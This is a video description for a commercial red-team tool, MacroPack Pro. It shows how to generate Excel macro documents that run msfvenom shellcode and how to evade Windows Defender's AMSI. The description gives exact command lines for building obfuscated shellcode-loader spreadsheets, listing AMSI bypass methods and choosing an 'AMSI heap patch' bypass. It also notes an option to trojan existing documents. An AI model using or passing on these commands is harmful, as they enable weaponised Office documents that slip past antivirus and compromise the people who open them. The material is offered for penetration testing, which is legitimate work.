Redteam: Bypass AMSI in Excel Macro using MacroPack Pro

This video shows one of the multiple ways MacroPack pro can be used to bypass AMSI
In this case, the payload is loading a raw shellcode running calc and generated with mvfvenom.
This payload or any document running this payload is considered malicious by default.

In the video I first show that the obfuscated payload is detected by Windows defender AMSI

This first payload is generated with:
echo x32calc.bin | macro_pack.exe -t SHELLCODE -o -G samples\sc.xls
(-o option means the payload is obfuscated, but this is not enough against AMSI)

Next I show the command line used to list the some of the AMSI bypass methods available in MP Pro
This command is:
macro_pack.exe --listamsibypass

Finally I choose the second AMSI method to generate a new payload which bypasses AMSI
Here is the command line used to generate the payload:
echo x32calc.bin | macro_pack.exe -t SHELLCODE -o -G samples\sc_bypass.xls --av-bypass --amsibypass=2

The -o option is used to obfuscate the payload.
--av-bypass is the specific option used for advanced AV bypass
--amsibypass=2 corresponds to "AMSI heap patch" method.
The -G option is used generate a new file (-T could also be used to trojan an existing document)

The base VBA code is the MacroPack SHELLCODE template which is used to run a given raw shellcode.

=========================================================================

MacroPack Pro is a tool for professional pentesters and redteamers.
More information is available at: https://www.balliskit.com
For more any inquiry, write to emeric.nasi [at] sevagas.com using a professional email address.

You can also check the limited community open source version here: https://github.com/sevagas/macro_pack
Follow us on Twitter at: https://twitter.com/BallisKit

Видео Redteam: Bypass AMSI in Excel Macro using MacroPack Pro канала Sevagas